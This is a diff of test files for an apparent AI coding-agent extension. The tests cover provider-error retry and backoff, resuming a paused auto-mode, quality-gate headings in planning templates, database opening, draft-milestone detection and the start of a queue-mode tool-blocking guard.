+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 15_000);
+});
+
+test("classifyError: 'Unterminated string in JSON' is transient stream", () => {
+  const result = classifyError(
+    "Unterminated string in JSON at position 100 (line 1 column 101)"
+  );
+  assert.equal(result.kind, "stream");
+  assert.ok(isTransient(result));
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 15_000);
 });
 
 // ── isTransientNetworkError ──────────────────────────────────────────────────
@@ -259,14 +307,98 @@ test("pauseAutoForProviderError falls back to indefinite pause when not rate lim
   ]);
 });
 
+// ── resumeAutoAfterProviderDelay ────────────────────────────────────────────
+
+test("resumeAutoAfterProviderDelay restarts paused auto-mode from the recorded base path", async () => {
+  const startCalls: Array<{ base: string; verboseMode: boolean; step?: boolean }> = [];
+  const result = await resumeAutoAfterProviderDelay(
+    {} as any,
+    { ui: { notify() {} } } as any,
+    {
+      getSnapshot: () => ({
+        active: false,
+        paused: true,
+        stepMode: true,
+        basePath: "/tmp/project",
+      }),
+      startAuto: async (_ctx, _pi, base, verboseMode, options) => {
+        startCalls.push({ base, verboseMode, step: options?.step });
+      },
+    },
+  );
+
+  assert.equal(result, "resumed");
+  assert.deepEqual(startCalls, [
+    { base: "/tmp/project", verboseMode: false, step: true },
+  ]);
+});
+
+test("resumeAutoAfterProviderDelay does not double-start when auto-mode is already active", async () => {
+  let startCalls = 0;
+  const result = await resumeAutoAfterProviderDelay(
+    {} as any,
+    { ui: { notify() {} } } as any,
+    {
+      getSnapshot: () => ({
+        active: true,
+        paused: false,
+        stepMode: false,
+        basePath: "/tmp/project",
+      }),
+      startAuto: async () => {
+        startCalls += 1;
+      },
+    },
+  );
+
+  assert.equal(result, "already-active");
+  assert.equal(startCalls, 0);
+});
+
+test("resumeAutoAfterProviderDelay leaves auto paused when no base path is available", async () => {
+  const notifications: Array<{ message: string; level: string }> = [];
+  let startCalls = 0;
+
+  const result = await resumeAutoAfterProviderDelay(
+    {} as any,
+    {
+      ui: {
+        notify(message: string, level?: string) {
+          notifications.push({ message, level: level ?? "info" });
+        },
+      },
+    } as any,
+    {
+      getSnapshot: () => ({
+        active: false,
+        paused: true,
+        stepMode: false,
+        basePath: "",
+      }),
+      startAuto: async () => {
+        startCalls += 1;
+      },
+    },
+  );
+
+  assert.equal(result, "missing-base");
+  assert.equal(startCalls, 0);
+  assert.deepEqual(notifications, [
+    {
+      message: "Provider error recovery delay elapsed, but no paused auto-mode base path was available. Leaving auto-mode paused.",
+      level: "warning",
+    },
+  ]);
+});
+
 // ── Escalating backoff for transient errors (#1166) ─────────────────────────
 
 test("agent-end-recovery.ts tracks consecutive transient errors for escalating backoff", () => {
   const src = readFileSync(join(__dirname, "..", "bootstrap", "agent-end-recovery.ts"), "utf-8");
 
   assert.ok(
-    src.includes("consecutiveTransientErrors"),
-    "agent-end-recovery.ts must track consecutiveTransientErrors for escalating backoff (#1166)",
+    src.includes("consecutiveTransientCount"),
+    "agent-end-recovery.ts must track consecutiveTransientCount for escalating backoff (#1166)",
   );
   assert.ok(
     src.includes("MAX_TRANSIENT_AUTO_RESUMES"),
@@ -274,15 +406,13 @@ test("agent-end-recovery.ts tracks consecutive transient errors for escalating b
   );
 });
 
-test("agent-end-recovery.ts resets consecutive transient error counter on success", () => {
+test("agent-end-recovery.ts resets retry state before resolveAgentEnd on success", () => {
   const src = readFileSync(join(__dirname, "..", "bootstrap", "agent-end-recovery.ts"), "utf-8");
 
-  // After successful agent_end (before resolveAgentEnd), the counter must be reset.
-  // Use a regex across the success block so CRLF checkouts on Windows do not
-  // push the reset line outside a fixed substring window.
+  // After successful agent_end, resetRetryState must be called before resolveAgentEnd.
   assert.ok(
-    /consecutiveTransientErrors\s*=\s*0\s*;[\s\S]{0,250}resolveAgentEnd/.test(src),
-    "consecutive transient error counter must be reset before resolveAgentEnd on the success path (#1166)",
+    /resetRetryState[\s\S]{0,250}resolveAgentEnd/.test(src),
+    "resetRetryState must be called before resolveAgentEnd on the success path (#1166)",
   );
 });
 
@@ -291,11 +421,24 @@ test("agent-end-recovery.ts applies escalating delay for repeated transient erro
 
   // Must contain the exponential backoff formula (may span multiple lines)
   assert.ok(
-    src.includes("2 ** Math.max(0, consecutiveTransientErrors"),
+    src.includes("2 ** Math.max(0, retryState.consecutiveTransientCount"),
     "agent-end-recovery.ts must escalate retryAfterMs exponentially for consecutive transient errors (#1166)",
   );
 });
 
+test("agent-end-recovery.ts resumes transient provider pauses through startAuto instead of a hidden prompt", () => {
+  const src = readFileSync(join(__dirname, "..", "bootstrap", "agent-end-recovery.ts"), "utf-8");
+
+  assert.ok(
+    src.includes("resumeAutoAfterProviderDelay"),
+    "agent-end-recovery.ts must resume paused auto-mode through resumeAutoAfterProviderDelay (#2813)",
+  );
+  assert.ok(
+    !src.includes('Continue execution — provider error recovery delay elapsed.'),
+    "transient provider resume must not rely on a hidden continue prompt (#2813)",
+  );
+});
+
 // ── Codex error extraction (#1166) ──────────────────────────────────────────
 
 test("openai-codex-responses.ts extracts nested error fields", () => {
@@ -315,13 +458,74 @@ test("openai-codex-responses.ts extracts nested error fields", () => {
   );
 });
 
+// ── Fix 1: resetTransientRetryState resets module-level singleton ────────────
+
+test("resetTransientRetryState is exported from agent-end-recovery.ts", () => {
+  const src = readFileSync(join(__dirname, "..", "bootstrap", "agent-end-recovery.ts"), "utf-8");
+  assert.ok(
+    src.includes("export function resetTransientRetryState"),
+    "agent-end-recovery.ts must export resetTransientRetryState for provider-error-resume.ts",
+  );
+});
+
+test("provider-error-resume.ts calls resetTransientRetryState before startAuto", () => {
+  const src = readFileSync(join(__dirname, "..", "bootstrap", "provider-error-resume.ts"), "utf-8");
+  assert.ok(
+    src.includes("resetTransientRetryState"),
+    "provider-error-resume.ts must import and call resetTransientRetryState",
+  );
+  // Ensure reset is called BEFORE startAuto — order matters
+  const resetIdx = src.indexOf("resetTransientRetryState()");
+  const startIdx = src.indexOf("await deps.startAuto(");
+  assert.ok(
+    resetIdx !== -1 && startIdx !== -1 && resetIdx < startIdx,
+    "resetTransientRetryState() must be called before deps.startAuto()",
+  );
+});
+
+// ── Fix 2: Session creation timeout treated as transient in phases.ts ───────
+
+test("phases.ts handles timeout session-creation failures with pause instead of stopAuto", () => {
+  const src = readFileSync(join(__dirname, "..", "auto", "phases.ts"), "utf-8");
+
+  // The cancelled + isTransient + category=timeout path must pause, not hard-stop
+  assert.ok(
+    src.includes('category === "timeout"'),
+    "phases.ts must check category === 'timeout' on transient cancelled unitResults",
+  );
+  // Must call pauseAuto (not stopAuto) for timeout cancellations
+  assert.ok(
+    /category === "timeout"[\s\S]{0,300}pauseAuto/.test(src),
+    "phases.ts must call pauseAuto for session-timeout failures (not stopAuto or continue)",
+  );
+  // Must NOT use action: "continue" for transient cancellations (causes infinite loops)
+  assert.ok(
+    !/isTransient[\s\S]{0,500}action:\s*"continue"/.test(src),
+    "phases.ts must NOT return action:continue for cancelled units — use break+pause instead",
+  );
+});
+
+// ── Fix 3: MAX_TRANSIENT_AUTO_RESUMES raised to 8 ───────────────────────────
+
+test("MAX_TRANSIENT_AUTO_RESUMES is at least 8 for sustained overload resilience", () => {
+  const src = readFileSync(join(__dirname, "..", "bootstrap", "agent-end-recovery.ts"), "utf-8");
+  const match = src.match(/MAX_TRANSIENT_AUTO_RESUMES\s*=\s*(\d+)/);
+  assert.ok(match, "MAX_TRANSIENT_AUTO_RESUMES must be defined");
+  const value = Number(match![1]);
+  assert.ok(
+    value >= 8,
+    `MAX_TRANSIENT_AUTO_RESUMES must be >= 8 for sustained overload resilience, got ${value}`,
+  );
+});
+
 // ── agent-session retryable regex handles server_error (#1166) ──────────────
 
 test("agent-session retryable error regex matches server_error (underscore)", () => {
   // This regex is extracted from _isRetryableError in agent-session.ts.
   // It must match both "server error" (space) and "server_error" (underscore)
   // to properly classify Codex streaming errors as retryable.
-  const retryableRegex = /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|temporarily backed off/i;
+  // "temporarily backed off" intentionally excluded — see #3429
+  const retryableRegex = /overloaded|rate.?limit|too many requests|429|500|502|503|504|service.?unavailable|server.?error|internal.?error|connection.?error|connection.?refused|other side closed|fetch failed|upstream.?connect|reset before headers|terminated|retry delay|network.?(?:is\s+)?unavailable|credentials.*expired|extra usage is required/i;
 
   // server_error (with underscore — Codex streaming error format)
   assert.ok(retryableRegex.test("Codex server_error: An error occurred"));
diff --git a/src/resources/extensions/gsd/tests/quality-gates.test.ts b/src/resources/extensions/gsd/tests/quality-gates.test.ts
new file mode 100644
index 000000000..faf788d5b
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/quality-gates.test.ts
@@ -0,0 +1,347 @@
+import { readFileSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+import { extractSection } from "../files.ts";
+import { createTestContext } from "./test-helpers.ts";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const templatesDir = join(__dirname, "..", "templates");
+const promptsDir = join(__dirname, "..", "prompts");
+
+const { assertTrue, report } = createTestContext();
+
+function loadTemplate(name: string): string {
+  return readFileSync(join(templatesDir, `${name}.md`), "utf-8");
+}
+
+function loadPrompt(name: string): string {
+  return readFileSync(join(promptsDir, `${name}.md`), "utf-8");
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Level 1: Templates contain quality gate headings
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("\n=== Level 1: Templates contain quality gate headings ===");
+{
+  const plan = loadTemplate("plan");
+  assertTrue(plan.includes("## Threat Surface"), "plan.md contains ## Threat Surface");
+  assertTrue(plan.includes("## Requirement Impact"), "plan.md contains ## Requirement Impact");
+
+  const taskPlan = loadTemplate("task-plan");
+  assertTrue(taskPlan.includes("## Failure Modes"), "task-plan.md contains ## Failure Modes");
+  assertTrue(taskPlan.includes("## Load Profile"), "task-plan.md contains ## Load Profile");
+  assertTrue(taskPlan.includes("## Negative Tests"), "task-plan.md contains ## Negative Tests");
+
+  const sliceSummary = loadTemplate("slice-summary");
+  assertTrue(sliceSummary.includes("## Operational Readiness"), "slice-summary.md contains ## Operational Readiness");
+
+  const roadmap = loadTemplate("roadmap");
+  assertTrue(roadmap.includes("## Horizontal Checklist"), "roadmap.md contains ## Horizontal Checklist");
+
+  const milestoneSummary = loadTemplate("milestone-summary");
+  assertTrue(milestoneSummary.includes("## Decision Re-evaluation"), "milestone-summary.md contains ## Decision Re-evaluation");
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Level 2: Prompts reference quality gates
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("\n=== Level 2: Prompts reference quality gates ===");
+{
+  const planSlice = loadPrompt("plan-slice");
+  assertTrue(planSlice.includes("Threat Surface"), "plan-slice.md mentions Threat Surface");
+  assertTrue(planSlice.includes("Requirement Impact"), "plan-slice.md mentions Requirement Impact");
+  assertTrue(planSlice.toLowerCase().includes("quality gate"), "plan-slice.md mentions quality gate");
+
+  const guidedPlanSlice = loadPrompt("guided-plan-slice");
+  assertTrue(
+    guidedPlanSlice.includes("Threat Surface") || guidedPlanSlice.includes("Q3"),
+    "guided-plan-slice.md mentions Threat Surface or Q3"
+  );
+
+  const executeTask = loadPrompt("execute-task");
+  assertTrue(executeTask.includes("Failure Modes"), "execute-task.md mentions Failure Modes");
+  assertTrue(executeTask.includes("Load Profile"), "execute-task.md mentions Load Profile");
+  assertTrue(executeTask.includes("Negative Tests"), "execute-task.md mentions Negative Tests");
+
+  const guidedExecuteTask = loadPrompt("guided-execute-task");
+  assertTrue(
+    guidedExecuteTask.includes("Failure Modes") || guidedExecuteTask.includes("Q5"),
+    "guided-execute-task.md mentions Failure Modes or Q5"
+  );
+
+  const completeSlice = loadPrompt("complete-slice");
+  assertTrue(completeSlice.includes("Operational Readiness"), "complete-slice.md mentions Operational Readiness");
+
+  const guidedCompleteSlice = loadPrompt("guided-complete-slice");
+  assertTrue(
+    guidedCompleteSlice.includes("Operational Readiness") || guidedCompleteSlice.includes("Q8"),
+    "guided-complete-slice.md mentions Operational Readiness or Q8"
+  );
+
+  const completeMilestone = loadPrompt("complete-milestone");
+  assertTrue(completeMilestone.includes("Horizontal Checklist"), "complete-milestone.md mentions Horizontal Checklist");
+  assertTrue(completeMilestone.includes("Decision Re-evaluation"), "complete-milestone.md mentions Decision Re-evaluation");
+
+  const planMilestone = loadPrompt("plan-milestone");
+  assertTrue(planMilestone.toLowerCase().includes("horizontal checklist"), "plan-milestone.md mentions horizontal checklist");
+
+  const guidedPlanMilestone = loadPrompt("guided-plan-milestone");
+  assertTrue(guidedPlanMilestone.includes("Horizontal Checklist"), "guided-plan-milestone.md mentions Horizontal Checklist");
+
+  const reassess = loadPrompt("reassess-roadmap");
+  assertTrue(reassess.includes("Threat Surface"), "reassess-roadmap.md mentions Threat Surface");
+  assertTrue(reassess.includes("Operational Readiness"), "reassess-roadmap.md mentions Operational Readiness");
+  assertTrue(reassess.includes("Horizontal Checklist"), "reassess-roadmap.md mentions Horizontal Checklist");
+
+  const replan = loadPrompt("replan-slice");
+  assertTrue(replan.includes("Threat Surface"), "replan-slice.md mentions Threat Surface");
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Level 3: Parser backward compatibility — extractSection handles new headings
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("\n=== Level 3: extractSection backward compatibility ===");
+{
+  // Old-style slice plan (no quality gate sections)
+  const oldPlan = `# S01: Auth Flow
+
+**Goal:** Build login
+**Demo:** User can log in
+
+## Must-Haves
+
+- Login form works
+- Session persists
+
+## Proof Level
+
+- This slice proves: integration
+
+## Tasks
+
+- [ ] **T01: Build login** \`est:1h\`
+`;
+
+  // New-style slice plan (with quality gate sections)
+  const newPlan = `# S01: Auth Flow
+
+**Goal:** Build login
+**Demo:** User can log in
+
+## Must-Haves
+
+- Login form works
+- Session persists
+
+## Threat Surface
+
+- **Abuse**: Credential stuffing, brute force login attempts
+- **Data exposure**: Session tokens in cookies, password in request body
+- **Input trust**: Username/password from form input reaching DB query
+
+## Requirement Impact
+
+- **Requirements touched**: R001, R003
+- **Re-verify**: Login flow, session management
+- **Decisions revisited**: D002
+
+## Proof Level
+
+- This slice proves: integration
+
+## Tasks
+
+- [ ] **T01: Build login** \`est:1h\`
+`;
+
+  // Old plan: quality gate sections return null (not found)
+  assertTrue(
+    extractSection(oldPlan, "Threat Surface") === null,
+    "extractSection returns null for Threat Surface on old plan"
+  );
+  assertTrue(
+    extractSection(oldPlan, "Requirement Impact") === null,
+    "extractSection returns null for Requirement Impact on old plan"
+  );
+
+  // Old plan: core sections still parse correctly
+  const oldMustHaves = extractSection(oldPlan, "Must-Haves");
+  assertTrue(
+    oldMustHaves !== null && oldMustHaves.includes("Login form works"),
+    "extractSection still parses Must-Haves on old plan"
+  );
+
+  // New plan: quality gate sections are extracted
+  const threatSurface = extractSection(newPlan, "Threat Surface");
+  assertTrue(
+    threatSurface !== null && threatSurface.includes("Credential stuffing"),
+    "extractSection extracts Threat Surface content from new plan"
+  );
+
+  const reqImpact = extractSection(newPlan, "Requirement Impact");
+  assertTrue(
+    reqImpact !== null && reqImpact.includes("R001"),
+    "extractSection extracts Requirement Impact content from new plan"
+  );
+
+  // New plan: core sections still parse correctly
+  const newMustHaves = extractSection(newPlan, "Must-Haves");
+  assertTrue(
+    newMustHaves !== null && newMustHaves.includes("Login form works"),
+    "extractSection still parses Must-Haves on new plan"
+  );
+
+  // Task plan: Failure Modes
+  const oldTaskPlan = `# T01: Build Login
+
+## Description
+
+Build the login endpoint.
+
+## Steps
+
+1. Create route
+`;
+
+  const newTaskPlan = `# T01: Build Login
+
+## Description
+
+Build the login endpoint.
+
+## Failure Modes
+
+| Dependency | On error | On timeout | On malformed response |
+|------------|----------|-----------|----------------------|
+| Auth DB | Return 500 | 3s timeout, retry once | Reject, log warning |
+
+## Steps
+
+1. Create route
+`;
+
+  assertTrue(
+    extractSection(oldTaskPlan, "Failure Modes") === null,
+    "extractSection returns null for Failure Modes on old task plan"
+  );
+
+  const failureModes = extractSection(newTaskPlan, "Failure Modes");
+  assertTrue(
+    failureModes !== null && failureModes.includes("Auth DB"),
+    "extractSection extracts Failure Modes content from new task plan"
+  );
+
+  // Slice summary: Operational Readiness
+  const oldSummary = `# S01: Auth Flow
+
+**Built login with session management**
+
+## Verification
+
+All tests pass.
+
+## Deviations
+
+None.
+`;
+
+  const newSummary = `# S01: Auth Flow
+
+**Built login with session management**
+
+## Verification
+
+All tests pass.
+
+## Operational Readiness
+
+- **Health signal**: /health endpoint returns 200 with session count
+- **Failure signal**: Auth error rate > 5% triggers alert
+- **Recovery**: Stateless — restart clears nothing
+- **Monitoring gaps**: None
+
+## Deviations
+
+None.
+`;
+
+  assertTrue(
+    extractSection(oldSummary, "Operational Readiness") === null,
+    "extractSection returns null for Operational Readiness on old summary"
+  );
+
+  const opReadiness = extractSection(newSummary, "Operational Readiness");
+  assertTrue(
+    opReadiness !== null && opReadiness.includes("/health endpoint"),
+    "extractSection extracts Operational Readiness content from new summary"
+  );
+}
+
+// ═══════════════════════════════════════════════════════════════════════════
+// Level 4: Template section ordering is correct
+// ═══════════════════════════════════════════════════════════════════════════
+
+console.log("\n=== Level 4: Template section ordering ===");
+{
+  const plan = loadTemplate("plan");
+  const mustHavesIdx = plan.indexOf("## Must-Haves");
+  const threatIdx = plan.indexOf("## Threat Surface");
+  const proofIdx = plan.indexOf("## Proof Level");
+  assertTrue(
+    mustHavesIdx < threatIdx && threatIdx < proofIdx,
+    "plan.md: Threat Surface is between Must-Haves and Proof Level"
+  );
+
+  const reqImpactIdx = plan.indexOf("## Requirement Impact");
+  assertTrue(
+    threatIdx < reqImpactIdx && reqImpactIdx < proofIdx,
+    "plan.md: Requirement Impact is between Threat Surface and Proof Level"
+  );
+
+  const taskPlan = loadTemplate("task-plan");
+  const descIdx = taskPlan.indexOf("## Description");
+  const failIdx = taskPlan.indexOf("## Failure Modes");
+  const stepsIdx = taskPlan.indexOf("## Steps");
+  assertTrue(
+    descIdx < failIdx && failIdx < stepsIdx,
+    "task-plan.md: Failure Modes is between Description and Steps"
+  );
+
+  const loadIdx = taskPlan.indexOf("## Load Profile");
+  const negIdx = taskPlan.indexOf("## Negative Tests");
+  assertTrue(
+    failIdx < loadIdx && loadIdx < negIdx && negIdx < stepsIdx,
+    "task-plan.md: Failure Modes < Load Profile < Negative Tests < Steps"
+  );
+
+  const sliceSummary = loadTemplate("slice-summary");
+  const reqInvalidIdx = sliceSummary.indexOf("## Requirements Invalidated");
+  const opIdx = sliceSummary.indexOf("## Operational Readiness");
+  const devIdx = sliceSummary.indexOf("## Deviations");
+  assertTrue(
+    reqInvalidIdx < opIdx && opIdx < devIdx,
+    "slice-summary.md: Operational Readiness is between Requirements Invalidated and Deviations"
+  );
+
+  const roadmap = loadTemplate("roadmap");
+  const horizIdx = roadmap.indexOf("## Horizontal Checklist");
+  const boundaryIdx = roadmap.indexOf("## Boundary Map");
+  assertTrue(
+    horizIdx > 0 && horizIdx < boundaryIdx,
+    "roadmap.md: Horizontal Checklist is before Boundary Map"
+  );
+
+  const milestoneSummary = loadTemplate("milestone-summary");
+  const reqChangesIdx = milestoneSummary.indexOf("## Requirement Changes");
+  const decRevalIdx = milestoneSummary.indexOf("## Decision Re-evaluation");
+  const fwdIntelIdx = milestoneSummary.indexOf("## Forward Intelligence");
+  assertTrue(
+    reqChangesIdx < decRevalIdx && decRevalIdx < fwdIntelIdx,
+    "milestone-summary.md: Decision Re-evaluation is between Requirement Changes and Forward Intelligence"
+  );
+}
+
+report();
diff --git a/src/resources/extensions/gsd/tests/query-tools-db-open.test.ts b/src/resources/extensions/gsd/tests/query-tools-db-open.test.ts
new file mode 100644
index 000000000..6795cbe6e
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/query-tools-db-open.test.ts
@@ -0,0 +1,47 @@
+/**
+ * Regression test for #3672 — query-tools uses ensureDbOpen
+ *
+ * gsd_milestone_status previously called isDbAvailable() but never
+ * ensureDbOpen(), making it always fail outside auto-mode sessions.
+ * The fix imports ensureDbOpen from dynamic-tools and calls it before
+ * querying the DB.
+ *
+ * This structural test verifies the ensureDbOpen import and usage exist
+ * in query-tools.ts.
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const source = readFileSync(join(__dirname, '..', 'bootstrap', 'query-tools.ts'), 'utf-8');
+
+describe('query-tools ensureDbOpen usage (#3672)', () => {
+  test('imports ensureDbOpen from dynamic-tools', () => {
+    assert.match(source, /ensureDbOpen.*import\(|import.*ensureDbOpen/,
+      'query-tools should import ensureDbOpen');
+  });
+
+  test('calls ensureDbOpen() before DB queries', () => {
+    assert.match(source, /await ensureDbOpen\(\)/,
+      'query-tools should call await ensureDbOpen()');
+  });
+
+  test('no longer imports isDbAvailable in the execute path', () => {
+    // The old code imported isDbAvailable and checked it; the fix removed that
+    // The execute function should not destructure isDbAvailable from gsd-db
+    const executeBlock = source.slice(source.indexOf('async execute('));
+    assert.doesNotMatch(executeBlock, /isDbAvailable,/,
+      'execute path should not destructure isDbAvailable (replaced by ensureDbOpen)');
+  });
+
+  test('uses dbAvailable result from ensureDbOpen', () => {
+    assert.match(source, /dbAvailable\s*=\s*await ensureDbOpen\(\)/,
+      'should store ensureDbOpen result in dbAvailable');
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/queue-draft-detection.test.ts b/src/resources/extensions/gsd/tests/queue-draft-detection.test.ts
index ff065c5e7..8ec04f55c 100644
--- a/src/resources/extensions/gsd/tests/queue-draft-detection.test.ts
+++ b/src/resources/extensions/gsd/tests/queue-draft-detection.test.ts
@@ -1,3 +1,5 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from "node:fs";
 import { join } from "node:path";
 import { tmpdir } from "node:os";
@@ -5,122 +7,94 @@ import { tmpdir } from "node:os";
 import { deriveState } from "../state.js";
 import { buildExistingMilestonesContext } from "../guided-flow.js";
 
-let passed = 0;
-let failed = 0;
+describe('queue-draft-detection', () => {
+  test('draft and context milestone detection', async () => {
+    const tmpBase = mkdtempSync(join(tmpdir(), "gsd-queue-draft-test-"));
+    const gsd = join(tmpBase, ".gsd");
 
-function assert(condition: boolean, message: string): void {
-  if (condition) {
-    passed++;
-  } else {
-    failed++;
-    console.error(`  FAIL: ${message}`);
-  }
-}
+    try {
+      // M001: has only CONTEXT-DRAFT.md (draft milestone)
+      mkdirSync(join(gsd, "milestones", "M001"), { recursive: true });
+      writeFileSync(
+        join(gsd, "milestones", "M001", "M001-CONTEXT-DRAFT.md"),
+        "# M001: Draft Milestone\n\nSeed material from prior discussion.\n",
+      );
 
-// ─── Fixture setup ──────────────────────────────────────────────────────
+      // M002: has full CONTEXT.md (ready milestone)
+      mkdirSync(join(gsd, "milestones", "M002"), { recursive: true });
+      writeFileSync(
+        join(gsd, "milestones", "M002", "M002-CONTEXT.md"),
+        "# M002: Ready Milestone\n\nFull context from deep discussion.\n",
+      );
 
-const tmpBase = mkdtempSync(join(tmpdir(), "gsd-queue-draft-test-"));
-const gsd = join(tmpBase, ".gsd");
+      // M003: has both CONTEXT.md and CONTEXT-DRAFT.md (CONTEXT wins)
+      mkdirSync(join(gsd, "milestones", "M003"), { recursive: true });
+      writeFileSync(
+        join(gsd, "milestones", "M003", "M003-CONTEXT.md"),
+        "# M003: Full Context\n\nThis is the real context.\n",
+      );
+      writeFileSync(
+        join(gsd, "milestones", "M003", "M003-CONTEXT-DRAFT.md"),
+        "# M003: Draft\n\nThis should be ignored.\n",
+      );
 
-// M001: has only CONTEXT-DRAFT.md (draft milestone)
-mkdirSync(join(gsd, "milestones", "M001"), { recursive: true });
-writeFileSync(
-  join(gsd, "milestones", "M001", "M001-CONTEXT-DRAFT.md"),
-  "# M001: Draft Milestone\n\nSeed material from prior discussion.\n",
-);
+      // M004: has neither (empty milestone dir)
+      mkdirSync(join(gsd, "milestones", "M004"), { recursive: true });
 
-// M002: has full CONTEXT.md (ready milestone)
-mkdirSync(join(gsd, "milestones", "M002"), { recursive: true });
-writeFileSync(
-  join(gsd, "milestones", "M002", "M002-CONTEXT.md"),
-  "# M002: Ready Milestone\n\nFull context from deep discussion.\n",
-);
+      // Build context
+      const state = await deriveState(tmpBase);
+      const milestoneIds = ["M001", "M002", "M003", "M004"];
+      const context = await buildExistingMilestonesContext(tmpBase, milestoneIds, state);
 
-// M003: has both CONTEXT.md and CONTEXT-DRAFT.md (CONTEXT wins)
-mkdirSync(join(gsd, "milestones", "M003"), { recursive: true });
-writeFileSync(
-  join(gsd, "milestones", "M003", "M003-CONTEXT.md"),
-  "# M003: Full Context\n\nThis is the real context.\n",
-);
-writeFileSync(
-  join(gsd, "milestones", "M003", "M003-CONTEXT-DRAFT.md"),
-  "# M003: Draft\n\nThis should be ignored.\n",
-);
+      // draft-only milestone includes "Draft context available"
+      assert.ok(
+        context.includes("Draft context available"),
+        "M001 (draft-only) should include 'Draft context available' label",
+      );
+      assert.ok(
+        context.includes("Seed material from prior discussion"),
+        "M001 draft content should be included in context output",
+      );
 
-// M004: has neither (empty milestone dir)
-mkdirSync(join(gsd, "milestones", "M004"), { recursive: true });
+      // full-context milestone uses "Context:" label
+      assert.ok(
+        context.includes("**Context:**"),
+        "M002 (full context) should use 'Context:' label",
+      );
+      assert.ok(
+        context.includes("Full context from deep discussion"),
+        "M002 context content should be included",
+      );
 
-// ─── Build context ──────────────────────────────────────────────────────
+      // both files: CONTEXT.md wins, no draft label
+      const m003Idx = context.indexOf("M003:");
+      const m003Section = context.slice(m003Idx, m003Idx + 500);
+      assert.ok(
+        m003Section.includes("**Context:**"),
+        "M003 (both files) should use 'Context:' label (CONTEXT.md wins)",
+      );
+      assert.ok(
+        !m003Section.includes("Draft context available"),
+        "M003 (both files) should NOT show draft label — CONTEXT.md takes precedence",
+      );
+      assert.ok(
+        m003Section.includes("This is the real context"),
+        "M003 should show CONTEXT.md content, not draft content",
+      );
 
-const state = await deriveState(tmpBase);
-const milestoneIds = ["M001", "M002", "M003", "M004"];
-const context = await buildExistingMilestonesContext(tmpBase, milestoneIds, state);
-
-// ─── Test: draft-only milestone includes "Draft context available" ──────
-
-assert(
-  context.includes("Draft context available"),
-  "M001 (draft-only) should include 'Draft context available' label",
-);
-
-assert(
-  context.includes("Seed material from prior discussion"),
-  "M001 draft content should be included in context output",
-);
-
-// ─── Test: full-context milestone uses "Context:" label ────────────────
-
-assert(
-  context.includes("**Context:**"),
-  "M002 (full context) should use 'Context:' label",
-);
-
-assert(
-  context.includes("Full context from deep discussion"),
-  "M002 context content should be included",
-);
-
-// ─── Test: both files → CONTEXT.md wins, no draft label ────────────────
-
-// Find M003's section and check it has Context: but not Draft
-const m003Idx = context.indexOf("M003:");
-const m003Section = context.slice(m003Idx, m003Idx + 500);
-
-assert(
-  m003Section.includes("**Context:**"),
-  "M003 (both files) should use 'Context:' label (CONTEXT.md wins)",
-);
-
-assert(
-  !m003Section.includes("Draft context available"),
-  "M003 (both files) should NOT show draft label — CONTEXT.md takes precedence",
-);
-
-assert(
-  m003Section.includes("This is the real context"),
-  "M003 should show CONTEXT.md content, not draft content",
-);
-
-// ─── Test: neither file → no context section ───────────────────────────
-
-const m004Idx = context.indexOf("M004:");
-const m004Section = context.slice(m004Idx, m004Idx + 500);
-
-assert(
-  !m004Section.includes("**Context:**"),
-  "M004 (neither file) should not have Context: label",
-);
-
-assert(
-  !m004Section.includes("Draft context available"),
-  "M004 (neither file) should not have Draft label",
-);
-
-// ─── Cleanup ──────────────────────────────────────────────────────────
-
-rmSync(tmpBase, { recursive: true, force: true });
-
-// ─── Results ──────────────────────────────────────────────────────────
-
-console.log(`\nqueue-draft-detection: ${passed} passed, ${failed} failed`);
-if (failed > 0) process.exit(1);
+      // neither file: no context section
+      const m004Idx = context.indexOf("M004:");
+      const m004Section = context.slice(m004Idx, m004Idx + 500);
+      assert.ok(
+        !m004Section.includes("**Context:**"),
+        "M004 (neither file) should not have Context: label",
+      );
+      assert.ok(
+        !m004Section.includes("Draft context available"),
+        "M004 (neither file) should not have Draft label",
+      );
+    } finally {
+      rmSync(tmpBase, { recursive: true, force: true });
+    }
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/queue-execution-guard.test.ts b/src/resources/extensions/gsd/tests/queue-execution-guard.test.ts
new file mode 100644
index 000000000..62662db8a
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/queue-execution-guard.test.ts
@@ -0,0 +1,166 @@
+/**
+ * Unit tests for the queue-mode execution guard (#2545).
+ *
+ * When queue phase is active, the agent should only create milestones —
+ * not execute work. This guard blocks write/edit/bash tool calls that
+ * target source code (non-.gsd/ paths) during queue mode.
+ *
+ * Exercises shouldBlockQueueExecution() — a pure function that checks:
+ *   (a) queuePhaseActive false → pass (not in queue mode)
+ *   (b) toolName is read-only (read, grep, find, ls) → pass
+ *   (c) toolName is ask_user_questions → pass (discussion tool)
+ *   (d) write/edit to .gsd/ path → pass (planning artifacts)
+ *   (e) write/edit to source path → block
+ *   (f) bash command → block (could execute work)
+ *   (g) registered GSD tools (gsd_milestone_generate_id, gsd_summary_save) → pass
+ *   (h) unknown custom tools → block
+ */
+
+import test from 'node:test';
+import assert from 'node:assert/strict';
+import { shouldBlockQueueExecution } from '../bootstrap/write-gate.ts';
+
